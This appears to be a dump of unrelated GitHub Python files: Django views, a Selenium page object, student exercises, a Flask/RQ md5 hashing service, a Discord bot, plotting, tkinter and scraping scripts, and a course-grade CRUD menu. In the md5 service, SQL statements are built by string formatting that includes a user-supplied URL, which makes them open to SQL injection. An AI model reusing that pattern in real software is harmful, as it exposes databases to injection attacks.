sr_ret.save()\n else:\n sr_test[0].made_by = Patient.objects.get(user=request.user)\n sr_test[0].ref_id = obj.id\n sr_test[0].save()\n if sr_test.count() > 1:\n for i in range(1, len(sr_test)):\n sr_test[i].delete()\n retain_old.delete()\n sr = ScheduleRequest.objects.create(schedule=obj, made_by=Patient.objects.get(user=request.user), request=\"U\")\n sr.save()\n return HttpResponseRedirect(self.success_url)\n return render(request, self.template_name, {'form': form})\n def get(self, request, *args, **kwargs):\n if request.user.is_authenticated and request.user.is_manager:\n self.object = self.get_object()\n return super().get(request, *args, **kwargs)\n return HttpResponse(\"Error 610!\")","repo_name":"8lurry/heartbeat","sub_path":"editorial/man_views.py","file_name":"man_views.py","file_ext":"py","file_size_in_byte":8908,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71282377129","text":"from features.pages.base_page import BasePage\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\n\n\nclass AccountFunction(BasePage):\n def __init__(self, driver):\n super().__init__(driver)\n self.action = ActionChains(driver)\n self.URL = \"https://magento.softwaretestingboard.com/customer/account/\"\n\n def check_contain(self, message):\n element = self.driver.find_element(By.XPATH, f'//div[contains(text(),\"{message}\")]')\n if element:\n status = True\n else:\n status = False\n return status\n\n def hover_button(self, value):\n select_elem = self.driver.find_element(By.XPATH, f'{value}')\n self.action.move_to_element(select_elem).perform()\n","repo_name":"MadalinaDiana/Luma-Magento-eCommerce","sub_path":"features/pages/functionality_account.py","file_name":"functionality_account.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35444221484","text":"\ndef stats(sorted_stats):\n print(sorted_stats)\n\n\n# {'Peter': ['OOP', 350], 'George': ['OOP', 300], 'Simo': ['Advanced', 600], 'Prakash': ['OOP', 300, 'Advanced', 250], 'Ani': ['JSCore', 400]}\n# [('Simo', 600), ('Prakash', 550), ('Ani', 400), ('Peter', 350), ('George', 300)]\ndef print_result(contest_dict, user_dict, sorted_stats):\n print(user_dict)\n print(contest_dict)\n\n # for key, value in contest_dict:\n # current_contest = key\n\n stats(sorted_stats)\n\n\ndef individual_statistics():\n pass\n\n\ndef dict_manager(username, contest, points, contest_dict, user_dict, sorted_stats):\n if username not in user_dict.keys():\n user_dict[username] = [contest, points]\n if user_dict[username][0] == contest and user_dict[username][1] < points:\n user_dict[username][1] = points\n if user_dict[username][0] != contest:\n user_dict[username] += contest, points\n\n # if username not in contest_dict.values():\n # contest_dict[contest] = [username, points]\n # if contest_dict[contest][0] == username and contest_dict[contest][1] < points:\n # contest_dict[contest][1] = points\n # if contest_dict[contest][0] != username:\n # contest_dict[contest] += username, points #[]\n\n if username not in contest_dict.values():\n contest_dict[contest] = username, points\n else:\n if contest_dict[contest][1] < points:\n contest_dict[contest][1] = points\n print(contest_dict.items())\n\n if contest_dict[contest][0] != username:\n contest_dict[contest] += username, points # []\n\n counter = 0\n individual_stats = {}\n for key, value in user_dict.items():\n name = key\n total = 0\n counter += 1\n for current_value in value:\n if type(current_value) == int:\n total += current_value\n individual_stats[name] = total\n sorted_stats = sorted(individual_stats.items(), key=lambda x: x[1], reverse=True)\n return contest_dict, user_dict, sorted_stats\n\n\ndef judge(contest_dict, user_dict):\n sorted_stats = {}\n while True:\n command = input()\n if command == \"no more time\":\n print_result(contest_dict, user_dict, sorted_stats)\n break\n # current_line = command.split(\" -> \")\n username, contest, points = command.split(\" -> \")\n points = int(points)\n contest_dict, user_dict, sorted_stats = dict_manager(username, contest, points, contest_dict, user_dict,\n sorted_stats)\n\n\nuser_dict = {}\ncontest_dict = {}\njudge(contest_dict, user_dict)\n","repo_name":"maon0002/Programming-Fundamentals-with-Python-September-December-2022","sub_path":"dictionaries__more_exercises/02_judge.py","file_name":"02_judge.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7021089625","text":"from hashlib import md5\nfrom flask_mail import Message, Mail\nfrom rq import get_current_job, Queue\nfrom app import app, mail\nimport requests\nimport os\nimport sqlite3\n\ndef run_sql(query):\n connection = sqlite3.connect(\"tasks.db\")\n cursor = connection.cursor()\n cursor.execute(query)\n res = cursor.fetchall()\n connection.commit()\n connection.close()\n return res\n\n# I use streaming download with 4Kb chunks,\n# in case of someone decide to hash full Game of Thrones in Blu-ray\ndef md5_sum(f):\n hash_md5 = md5()\n for chunk in f.iter_content(4096):\n hash_md5.update(chunk)\n return hash_md5.hexdigest()\n\ndef send_email(result, url, status, email):\n try:\n with app.app_context():\n msg = Message(\n str({ \"md5\" : result, \"url\" : url, \"status\" : status}),\n sender = \"veryveryuniquemail@gmail.com\",\n recipients = [email]\n )\n mail.send(msg)\n return True\n except:\n return False\n\ndef failed(url, email, token, step):\n if (step == \"Download\"):\n run_sql(\"INSERT INTO tasks VALUES (\\\"%s\\\", \\\"\\\", \\\"%s\\\", -1);\" % (token, url))\n elif (step == \"Hash\"):\n run_sql(\"UPDATE tasks SET md5 = \\\"\\\", status = -1 WHERE id = \\\"%s\\\";\" % token)\n if (email != None):\n send_email(\"None\", url, \"%s error\" % step, email)\n return\n\ndef run_task(url, email):\n token = get_current_job().id\n f = 0\n try:\n f = requests.get(url, stream=True)\n assert(f.status_code == 200)\n except:\n failed(url, email, token, \"Download\")\n return \"Download error\"\n\n run_sql(\"INSERT INTO tasks VALUES (\\\"%s\\\", \\\"\\\", \\\"%s\\\", 0);\" % (token, url))\n result = \"\"\n try:\n result = md5_sum(f)\n except:\n failed(url, email, token, \"Hash\")\n return \"Hash error\"\n run_sql(\"UPDATE tasks SET md5 = \\\"%s\\\", status = 1 WHERE id = \\\"%s\\\";\" % (result, token))\n status = \"Done\"\n if (email != None and send_email(result, url, status, email) == False):\n status = \"Email sending error: %s\" % email\n return status\n\n","repo_name":"ManWhoLaughs/md5hash_service","sub_path":"app/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10540378958","text":"from nekyo import *\n\n\n################################################################\n# 実行ブロック\n################################################################\ndef prompt(obj):\n \"\"\"\n :param obj 返答するオブジェクト:\n :return 返答内容:\n \"\"\"\n\n return obj.get_name() + ':' + obj.get_responder_name() + '> '\n\n\nprint('nobrainNekyo')\n\nnekyo = Nekyo('nekyo')\n\nwhile True:\n inputs = input(' > ')\n if not inputs:\n print('バイバイ')\n break\n response = nekyo.dialogue(inputs)\n print(prompt(nekyo), response)\n","repo_name":"nekyoJap/NoBrainNekyo","sub_path":"exeNekyo.py","file_name":"exeNekyo.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10598125252","text":"message = input('input your message:')\nmessage = message.lower()\nmessage = message.replace(' ','')\nmessage= list(message)\nresult = True\nfor i in range(int(len(message)/2)):\n if message[i] == message[len(message) - i - 1]:\n continue\n else:\n result = False\n break\n\nif result:\n print(\"its a palindrome\")\nelse:\n print('its not a palindrome')","repo_name":"Ghostpupper/Pythoncourse","sub_path":"5.1.11.7 LAB.py","file_name":"5.1.11.7 LAB.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"138132887","text":"# pip install discord.py, beautifulsoup4, lxml, python-dotenv\r\nimport os\r\n\r\nimport discord\r\nfrom dotenv import load_dotenv\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n load_dotenv()\r\n TOKEN = os.getenv('DISCORD_TOKEN')\r\n GUILD = os.getenv('DISCORD_GUILD')\r\n\r\n client = discord.Client()\r\n\r\n @client.event\r\n async def on_ready():\r\n guild = discord.utils.find(lambda g: g.name == GUILD, client.guilds)\r\n print(\r\n f'{client.user} is connected to the following guild:\\n'\r\n f'{guild.name}(id: {guild.id})'\r\n )\r\n\r\n @client.event\r\n async def on_member_join(member):\r\n await member.create_dm()\r\n await member.dm_channel.send(\r\n f'Hi {member.name}, welcome to my Discord server! Make yourself at home. Hop in one of our voice channels any time, we have a great community that would love for you to hop in. If you have any questions hit up a Guru for guidance.'\r\n )\r\n \r\n\r\n client.run(TOKEN)","repo_name":"Misterguruman/GuruBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34845101995","text":"# Test for RegPore2D.\n\nfrom RecPore2D import RegPore2D as rp\na = rp(nx=11,ny=5,radius=0.02,packing='tri')\n\n\n#a.bounding_box=[[0.0,0.0,0.5], [1.0,1.0,1.0]]\na.write_mesh(meshtype='snappy')\na.write_mesh(fname='a.geo',meshtype='gmsh')\n\n\n","repo_name":"jjhidalgo/RecPore2D","sub_path":"tests/testsnappy.py","file_name":"testsnappy.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"39365299882","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import *\n\n\n# Create all the GUI elements, and handle button clicks\ndef buildGUI(DAO):\n\n # Main Tkinter window\n mainWindow = tk.Tk()\n mainWindow.configure(background = \"#44475a\")\n #mainWindow.geometry(\"400x200\")\n mainWindow.resizable(0,0)\n mainWindow.title(\"concert-tracker-gui\")\n\n # Labels and text entry boxes\n artistLabel = Label(mainWindow, bg=\"#44475a\", fg=\"#f8f8f2\", text=\"Artist:\")\n artistEntry = Entry(mainWindow, width=40, borderwidth=0)\n \n dateLabel = Label(mainWindow, bg=\"#44475a\", fg=\"#f8f8f2\", text=\"Date (YYYY-MM-DD):\", )\n dateEntry = Entry(mainWindow, width=40, borderwidth=0)\n \n venueLabel = Label(mainWindow, bg=\"#44475a\", fg=\"#f8f8f2\", text=\"Venue:\")\n venueEntry = Entry(mainWindow, width=40, borderwidth=0)\n\n spacer = Label(mainWindow, bg=\"#44475a\", fg=\"#f8f8f2\", text=\"\")\n\n # Button objects\n addButton = Button(mainWindow, bg = \"#50fa7b\", width = 38, bd = \"0\", activebackground = \"#f1fa8c\", text=\"Add\", cursor = \"hand2\", command=lambda: addEntryFromGUI(DAO, artistEntry, dateEntry, venueEntry))\n \n viewButton = Button(mainWindow, bg = \"#8be9fd\", width = 38, bd = \"0\", activebackground = \"#f1fa8c\", text=\"View Table\", cursor = \"hand2\", command=lambda: viewTable(mainWindow, DAO))\n \n clearButton = Button(mainWindow, bg = \"#ff5555\", width = 38, bd = \"0\", activebackground = \"#f1fa8c\", text=\"Clear the table\", cursor = \"hand2\", command=lambda: clearTable(DAO, mainWindow))\n\n closeButton = Button(mainWindow, width = 38, bd='0', activebackground = \"#f1fa8c\", text=\"Exit\", cursor = \"hand2\", command=lambda: closeMainWindow(mainWindow))\n\n # Place all gui elements with grid method, Sticky is how I am justifying left\n artistLabel.grid(row=0, column=0)\n artistEntry.grid(row=1, column=0)\n dateLabel.grid(row=2, column=0)\n dateEntry.grid(row=3, column=0)\n venueLabel.grid(row=4, column=0)\n venueEntry.grid(row=5, column=0)\n spacer.grid(row=6, column = 0)\n addButton.grid(row=7, column=0)\n viewButton.grid(row=8, column=0)\n clearButton.grid(row=9, column=0)\n closeButton.grid(row=10, column = 0)\n\n mainWindow.mainloop()\n\n# Add a new tuple to the table when add is clicked\ndef addEntryFromGUI(DAO, artistEntry, dateEntry, venueEntry):\n\n # Get the values from GUI\n artist = artistEntry.get()\n date = dateEntry.get()\n venue = venueEntry.get()\n\n # Call the DAO to add an entry based on the strings in the text boxes\n DAO.addEntry(artist, date, venue) \n\n # Clear the GUI text boxes\n artistEntry.delete(0, END)\n dateEntry.delete(0, END)\n venueEntry.delete(0,END)\n\n# Clear the table by dropping and rebuilding it\ndef clearTable(DAO, mainWindow):\n\n # Bring up a new window to confirm clearing the table\n popupWindow = tk.Toplevel(mainWindow)\n popupWindow.resizable(0,0)\n popupWindow.title(\"Confirm\")\n popupWindow.configure(background = \"#44475a\")\n\n confirmClear = Button(popupWindow, bg = \"#ff5555\", bd = \"0\", activebackground = \"#f1fa8c\", text=\"Confirm clear\", command=lambda: clearConfirmed(DAO, popupWindow))\n \n confirmClear.grid(sticky = W, row = 0, column = 0)\n\n # Actually send SQL command to clear table if confirmation pressed\n # I have a feeling this could definitely be simplified\n def clearConfirmed(DAO, popupWindow):\n DAO.clearTable()\n popupWindow.destroy()\n \ndef viewTable(mainWindow, DAO):\n \n # New popup to display the table\n popupWindow = tk.Toplevel(mainWindow)\n popupWindow.resizable(0,0)\n popupWindow.title(\"Table view\")\n popupWindow.configure(background = \"#44475a\")\n\n entries = DAO.collectAllEntries()\n \n # TODO: Get a better understanding of how to style this treeview\n\n # Set ttk style need to color treeview\n style = ttk.Style(popupWindow)\n style.theme_use(\"clam\")\n #style.configure(\"Treeview\", background=\"#44475a\", foreground=\"#f8f8f2\")\n style.configure(\"Heading\", background = \"#44475a\", foreground=\"#f8f8f2\", relief=\"flat\")\n \n # Declare treeview and insert information from list\n cols = ('Number', 'Artist', 'Date', 'Venue')\n listBox = ttk.Treeview(popupWindow, columns=cols, show='headings')\n \n for i, (Number, Artist, Date, Venue) in enumerate(entries, start=1):\n listBox.insert(\"\", \"end\", values=(Number, Artist, Date, Venue))\n\n for col in cols:\n listBox.heading(col, text=col) \n listBox.grid(row=0, column=0, columnspan=2)\n\n # Function called by close button\n def closeViewTable():\n popupWindow.destroy()\n\n # Function called by print button\n # TODO Finish this function\n def printViewTable():\n return\n\n # Buttons at the bottom of the view page\n closeButton = tk.Button(popupWindow, bg = \"#ff5555\", bd = \"0\", activebackground = \"#f1fa8c\", text=\"Close\", width=15, command=closeViewTable)\n closeButton.grid(sticky = W, row=4, column=0)\n printButton = tk.Button(popupWindow, bg = \"#8be9fd\", bd = \"0\", activebackground = \"#f1fa8c\", text=\"Print\", width=15, command=printViewTable)\n printButton.grid(sticky = E, row=4, column=1)\n\ndef closeMainWindow(mainWindow):\n mainWindow.destroy()\n ","repo_name":"mitchfen/concert-tracker","sub_path":"src/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42490138422","text":"# UNI: jjl2245, me2680\n\"\"\"A script that converts flac files to wav files\"\"\"\n\nimport glob, os\n\npath = '../data/AR/' # the folder to go through all audio files for\nos.chdir(path) # set the working directory\nfor f in glob.glob(\"*.flac\"): # go through all files that are flac files\n os.system('ffmpeg -i ' + path + f + ' ' + path + f.rsplit( \".\", 1 )[ 0 ] + '.wav') # use ffmpeg to convert it to wav\n os.remove(path + f) # delete the old flac file\n\nfor f in glob.glob(\"*.flac\"): # make sure that there are no flac files remaining\n print(f) # print the file path if there is one\n","repo_name":"jjlee0802cu/open-set-lid","sub_path":"s5_r3/scripts/scripts_data/flac_to_wav.py","file_name":"flac_to_wav.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20761870548","text":"import json\nimport codecs\nimport requests\nfrom os import mkdir\nfrom bs4 import BeautifulSoup\n\nLIMBO_PROJECTS_TABLE_INDEX = -1\nPWN_GAME_TABLE_INDEX = -4\nNINJAS_TABLE_INDEX = 0\nACTIVES_TABLE_INDEX = 1\nZOMBIES_TABLE_INDEX = 2\nPENSIONS_TABLE_INDEX = 3\nCOMMEMORATION_TABLE_INDEX = 4\nTABLE_OFFSET = 15\nLAST_CHALLENGES_TABLE = 37\nUSELESS_TABLE_1 = 17\nUSELESS_TABLE_2 = 19\n\ng_users = [{'status': 'ninja', 'users': []},\n {'status': 'active', 'users': []},\n {'status': 'zombie', 'users': []},\n {'status': 'pension', 'users': []},\n {'status': 'commemoration', 'users': []}]\n\n\ndef soup_site(url):\n r = requests.get(url)\n\n return BeautifulSoup(r.text, 'html.parser')\n\n\ndef write_content(path: str, content):\n \"\"\"Writes the content of the found users and solved challenges to a file.\n :param path: where the file will be save.\n :type path: str\n :param content: the cotent to be written into the file.\n \"\"\"\n while True:\n try:\n with codecs.open(path, 'w', encoding='utf-8') as file:\n json.dump(content, file, ensure_ascii=False)\n\n break\n except IOError:\n mkdir(path[:path.index('\\\\')])\n\n\ndef download_image(content, title):\n while True:\n try:\n with open(\"pics\\\\\" + title + \".png\", \"wb\") as file:\n file.write(content)\n\n break\n except FileNotFoundError:\n mkdir(\"pics\")\n\n\ndef users_tables_organize(tables):\n \"\"\"connect to all the function that collects data about users and organize the data.\n :param tables: all of the tables in the page.\n :type tables: bs4 element.\n \"\"\"\n global g_users\n\n ninja, active, zombie, pension, commemoration, *_ = tables\n\n ninja_active(ninja, NINJAS_TABLE_INDEX)\n ninja_active(active, ACTIVES_TABLE_INDEX)\n zombie_info(zombie)\n pension_commemoration_info(pension, PENSIONS_TABLE_INDEX)\n pension_commemoration_info(commemoration, COMMEMORATION_TABLE_INDEX)\n\n for s in g_users:\n write_content(\"users\\\\\" + s['status'] + \".json\", s['users'])\n\n\ndef ninja_active(table, table_index):\n for tr in table.tbody.find_all('tr')[1:]:\n _, name, *_, houses = tr.find_all('td')\n houses = [house['title'] for house in houses.find_all('a')]\n g_users[table_index]['users'].append(dict({'name': name.a.text, 'houses': houses}))\n\n\ndef zombie_info(table):\n for tr in table.tbody.find_all('tr')[1:]:\n _, name, _, remark, *_, houses = tr.find_all('td')\n\n houses = [house['title'] for house in houses.find_all('a')]\n g_users[ZOMBIES_TABLE_INDEX]['users'].append(\n dict({'name': name.a.text, 'houses': houses, 'remarks': remark.text.replace('\\n', '')}))\n\n\ndef pension_commemoration_info(table, table_index):\n for tr in table.tbody.find_all('tr')[1:]:\n name, *_, houses = tr.find_all('td')\n\n if houses.a is not None:\n houses = [house['title'] for house in houses.find_all('a')]\n\n g_users[table_index]['users'].append(dict({'name': name.text.replace('\\n', ''), 'houses': houses}))\n else:\n g_users[table_index]['users'].append(dict({'name': name.text.replace('\\n', ''), 'houses': []}))\n\n\ndef games_tables_organize(tables):\n \"\"\"connect to all of the functions that collects data about the games and organize the data.\n :param tables: all of the tables in the page.\n :type tables: bs4 element\n \"\"\"\n games = [{'name': 'samorai_c', 'ranks': []},\n {'name': 'python_slayer', 'ranks': []},\n {'name': 'coffee_makers', 'ranks': []}]\n\n *_, samorai_c, python_slayer, coffee_makers, _, _, _, _ = tables\n\n for i, game_name in enumerate([samorai_c, python_slayer, coffee_makers]):\n games[i]['ranks'] = import_games(game_name)\n\n\ndef import_games(table) -> list:\n \"\"\"Gets all the games of beta and the first 3 rankes.\n :param table: the context to be analyzed.\n :type table: bs4 element\n :return: game table with the name of it and first 3 ranks.\n :rtype: list\n \"\"\"\n ranks = list()\n\n for row in table.find_all('tr')[1:4]:\n *_, title, _, image = row.find_all('td')\n\n title = title.text.replace('\\n', '')\n image = image.a.img['src']\n\n r = requests.get('https:' + image)\n\n download_image(r.content, title)\n\n ranks.append(dict({'title': title, 'image': r.content}))\n\n return ranks\n\n\ndef import_challenges_organize(tables, challenges: list):\n for table in range(TABLE_OFFSET, LAST_CHALLENGES_TABLE):\n if table != USELESS_TABLE_1 and table != USELESS_TABLE_2:\n challenges[table - TABLE_OFFSET - (table > USELESS_TABLE_1) - (table > USELESS_TABLE_2)][\n 'challenges'] = import_challenges(tables[table])\n\n for challenge in challenges:\n write_content(\"challenges_tables\\\\\" + challenge['table_name'] + \".json\", challenge['challenges'])\n\n\ndef import_challenges_table_name(soup) -> list:\n \"\"\"Gets the challenges names from the page (c, python, java... etc)\n :param soup: all of the page in 'lxml' format.\n :type soup: bs4 element\n :return: list of the challenges names\n :rtype: list\n \"\"\"\n challenges_table_names = list()\n div_tags = soup.find_all('div', class_=\"mw-content-ltr\")\n\n for div_tag in div_tags:\n li_tags = div_tag.find_all('li', class_=\"toclevel-1 tocsection-54\")\n\n for li_tag in li_tags:\n challenges_table_names = [challenge_name.text for challenge_name in\n li_tag.find_all('span', class_=\"toctext\")[1:]]\n\n break\n challenges_table_names = [{'table_name': challenges_table_names[i], 'challenges': []} for i in\n range(len(challenges_table_names))]\n\n return challenges_table_names\n\n\ndef import_challenges(table) -> list:\n \"\"\"Gets the challenges of each category from the page (c, python, java... etc)\n :param table: each table is a new category.\n :type table: bs4 element\n :return: list of the challenges of each category\n :rtype: list\n \"\"\"\n challenges = list()\n\n for row in table.tbody.find_all('tr')[1:]:\n challenge_name, points, _, discription, _, dl = row.find_all('td')\n\n dl = dl.text.replace('\\n', '')\n\n if dl == '':\n dl = '-'\n\n challenges.append(dict({'challenge_name': challenge_name.text.replace('\\n', ''),\n 'points': points.text.replace('\\n', ''),\n 'discription': discription.text.replace('\\n', ''),\n 'deadline': dl}))\n\n return challenges\n\n\ndef solved_challenges_table_organize():\n \"\"\"connects to all of the functions that collects data on the solved challenges table an organize\n the data.\n \"\"\"\n solved_challenges = list()\n second_page_url = 'https://beta.wikiversity.org/wiki/User:The_duke/solved_beta_challenges'\n\n soup = soup_site(second_page_url)\n tables = soup.find_all('table')\n heads = soup.find_all('h3')\n\n table_names = [table_name.text.replace('[edit]', '') for table_name in heads if '[edit]' in table_name.text]\n\n for table_name in range(len(table_names)):\n challenges_and_solvers = import_solved_challenges(tables[table_name])\n solved_challenges.append({'subject': table_names[table_name], 'challenges': challenges_and_solvers})\n\n for solved_challenge in solved_challenges:\n write_content('solved_challenges\\\\' + solved_challenge['subject'] + '.json', solved_challenge)\n\n\ndef import_solved_challenges(table) -> list:\n \"\"\"Gets the solved challenges and their solvers.\n :param table: the context to be analyzed (isnt the same as the previous ones).\n :type table: bs4 element\n :return: challenges name and its solvers.\n :rtype: list\n \"\"\"\n solved_challenges_table = list()\n\n for row in table.find_all('tr')[1:]:\n challenge_name, solvers = row.find_all('td')\n challenge_name = challenge_name.text.replace('\\n', '')\n solvers = solvers.text.replace('\\n', '').split('* ')[1:]\n solved_challenges_table.append(dict({'challenge_name': challenge_name, 'solvers': solvers}))\n\n return solved_challenges_table\n\n\ndef get_pwn_game(table):\n ninja_games_ranks = list()\n\n for row in table.find_all('tr')[1:]:\n try:\n _, image, *_ = row.find_all('td')\n\n title = image.a['title']\n image_url = 'https:' + image.img['src']\n\n r = requests.get(image_url)\n\n download_image(r.content, title)\n\n ninja_games_ranks.append(dict({'title': title, 'image': str(r.content)}))\n except TypeError:\n continue\n write_content(\"Ninja_games\\\\pwn_game.json\", ninja_games_ranks)\n\n\ndef limbo_projects(main_projects_in_limbo_table):\n projects = list()\n\n for row in main_projects_in_limbo_table.find_all('tr')[1:]:\n project_name, contact, description, last_seen = row.find_all('td')\n project_name = project_name.text.replace('\\n', '')\n contact = contact.text.replace('\\n', ', ')\n description = description.text.replace('\\n', '')\n last_seen = last_seen.text.replace('\\n', '')\n\n projects.append({'project_name': project_name,\n 'contact': contact,\n 'description': description,\n 'last_seen': last_seen})\n\n write_content(\"projects\\\\limbo_projects.json\", projects)\n\n\ndef main():\n main_page_url = \"https://beta.wikiversity.org/wiki/%D7%9C%D7%99%D7%9E%D7%95%D7%93%D7%99_%D7%9E%D7%97%D7%A9%D7%91\" \\\n \"%D7%99%D7%9D_%D7%91%D7%A9%D7%99%D7%98%D7%AA_%D7%91%D7%98%D7%90 \"\n\n soup = soup_site(main_page_url)\n main_tables = soup.find_all('table', class_=\"wikitable sortable\")\n challenges_tables = soup.find_all('table', class_=\"wikitable\")\n\n challenges = import_challenges_table_name(soup)\n users_tables_organize(main_tables)\n games_tables_organize(main_tables)\n solved_challenges_table_organize()\n import_challenges_organize(challenges_tables, challenges)\n get_pwn_game(main_tables[PWN_GAME_TABLE_INDEX])\n limbo_projects(main_tables[LIMBO_PROJECTS_TABLE_INDEX])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"itayboop/scraper.db","sub_path":"updated_scraper.py","file_name":"updated_scraper.py","file_ext":"py","file_size_in_byte":10228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38868230914","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport plotsettings\nfrom matplotlib.font_manager import FontProperties\nfrom scipy.integrate import odeint\nfrom mpl_toolkits.axes_grid.inset_locator import (inset_axes, InsetPosition, mark_inset)\n\n#data location\nfile_location ='/home/ashok/gravitational_wave_memory_project/data/NonSpinning_differentMassRatio/Memory_data/'\n#import data\nmass_ratio_vec = [1, 1.5, 2, 2.5, 3, 4, 5, 6, 7, 8, 9.5]\nfilename_vec=['q1', 'q1p5', 'q2', 'q2p5','q3','q4','q5','q6', 'q7', 'q8','q9p5']\n\nfilename = filename_vec[1]\n\ndatafile_hNRdot='rMPsi4_noSpin_'+filename+'dataClean_hdotNR.dat'\ndatafile_hNR='rMPsi4_noSpin_'+filename+'dataClean_hNR.dat'\ndatafile_hMemNR='rMPsi4_noSpin_'+filename+'dataClean_hMemNR.dat'\n\ntimeNR, hmem, h_mem_plus = np.loadtxt(file_location+datafile_hMemNR, unpack=True)\ntimeNR, hdot_plus, hdot_cross = np.loadtxt(file_location+datafile_hNRdot, unpack=True)\ntimeNR, h_plus, h_cross = np.loadtxt(file_location+datafile_hNR, unpack=True)\n\n#Making plots\nlegend_size = 5\nfig = plt.figure()\nfontP = FontProperties()\n\nplt.plot(timeNR, h_plus)\nplt.plot(timeNR, h_plus + (0.0002*(timeNR+1000))**2, 'r--')\nplt.xlim(-1000, 200)\nplt.ylim(-0.5,0.5)\nplt.grid()\nplt.xlabel(r'$t/M$')\nplt.ylabel(r'$(R/M)\\,h}_{+}$')\nplt.legend(loc=2)\nfontP.set_size('13.')\n\nplt.savefig(\"/home/ashok/Desktop/IPTA slides/Strain.png\")\nplt.show()\n\n","repo_name":"aschoudry/GWmemory","sub_path":"scripts/Make_IPTAplots.py","file_name":"Make_IPTAplots.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24297724864","text":"from os import system\n#REGUSTRO DE CURSOS , CRUD , CODIGO, CURSO, NOTAS\ndef menu():\n system('cls')\n print(\"=\"*60)\n print(\"=\"*15 + \"REGISTRO DE NOTAS DE CURSOS\" + \"=\"*18)\n print(\"=\"*60)\n print(\"Opciones:\")\n print(\" [1] Consulta\")\n print(\" [2] Registro\")\n print(\" [3] Actualizar\")\n print(\" [4] Eliminar\")\n print(\" [0] Salir\")\n print(\"=\"*60)\n opcion = input(\"Ingrese el número de la acción que desea realizar: \")\n return opcion\n \n#DEFINIR VARIABLE DE ENTRADA Y SALIDA\ncursos = []\nsalir = \"0\"\n#LOGICA\ndef consulta():\n for a in cursos:\n for clave, valor in a.items():\n print(clave +\":\"+ valor)\n print(\"=\"*20)\n\ndef registro(id,nom,nota):\n nuevoCurso = {\n 'código' : id,\n 'nombre' : nom,\n 'calificación' : nota\n }\n cursos.append(nuevoCurso)\n\n\n\ndef actualizar():\n system('cls')\n print(\"=\"*60)\n print(\"=\"*21 + \"ACTUALIZANDO DATOS\" + \"=\"*21)\n print(\"=\"*60)\n cursoActualizado = input(\"Ingrese el curso a actualizar: \")\n for i in range(len(cursos)):\n a = cursos[i]\n for clave,valor in a.items():\n if valor == cursoActualizado:\n print(a)\n posCurso = i\n break\n print(\"Actualizando datos:\")\n id = input(\"Código: \")\n nom = input(\"Nombre del curso: \")\n nota = input(\"Calificación: \") \n nuevoCurso = {\n 'código' : id,\n 'nombre' : nom,\n 'calificación' : nota\n }\n del cursos[posCurso]\n cursos.insert(posCurso,nuevoCurso)\n\ndef eliminar():\n system('cls')\n print(\"=\"*60)\n print(\"=\"*13 + \"ELIMINACIÓN DE REGISTROS GUARDADOS\" + \"=\"*13)\n print(\"=\"*60)\n eliminar = input(\"Ingrese el curso a eliminar: \")\n for i in range(len(cursos)):\n a = cursos[i]\n for clave, valor in a.items():\n if valor == eliminar:\n posCurso = i\n print(a)\n break\n print(\"\\n---------------Curso Eliminado---------------\")\n del cursos[posCurso]\n\n \n\n#RESULTADO\nwhile(salir == \"0\"): \n opcion = menu()\n\n\n if opcion == \"1\":\n system('cls')\n print(\"=\"*60)\n print(\"=\"*20 + \"RESULTADO DE BUSQUEDA\" + \"=\"*19)\n print(\"=\"*60)\n consulta()\n print(\"Pulsa enter para regresar al menú\") \n input(\"\") \n\n\n if opcion == \"2\":\n system('cls')\n print(\"=\"*60)\n print(\"=\"*23 + \"NUEVO REGISTRO\" + \"=\"*23)\n print(\"=\"*60)\n print(\"Registrando nuevo alumno:\")\n id = input(\"Código: \")\n nom = input(\"Nombre del curso: \")\n nota = input(\"Calificación: \")\n r = registro(id,nom,nota)\n if r == 1:\n print(\"---------!registro exitoso!-------------\")\n while(salir == \"0\"):\n print(\"\\nContinuar: ¿si? ¿no?\")\n op = input(\" \")\n if (op == \"si\"):\n system('cls')\n print(\"=\"*60)\n print(\"=\"*23 + \"NUEVO REGISTRO\" + \"=\"*23)\n print(\"=\"*60)\n print(\"Registrando nuevo alumno:\")\n id = input(\"Código: \")\n nom = input(\"Nombre del curso: \")\n nota = input(\"Calificación: \")\n r = registro(id,nom,nota)\n if r == 1:\n print(\"---------!registro exitoso!-------------\")\n if (op == \"no\"):\n break \n\n\n if opcion == \"3\":\n actualizar()\n while(salir == \"0\"):\n print(\"\\nContinuar: ¿si? ¿no?\")\n op = input(\"\")\n if (op == \"si\"):\n actualizar()\n if (op == \"no\"):\n break\n\n\n if opcion == \"4\":\n eliminar()\n while(salir == \"0\"):\n print(\"\\nContinuar: ¿si? 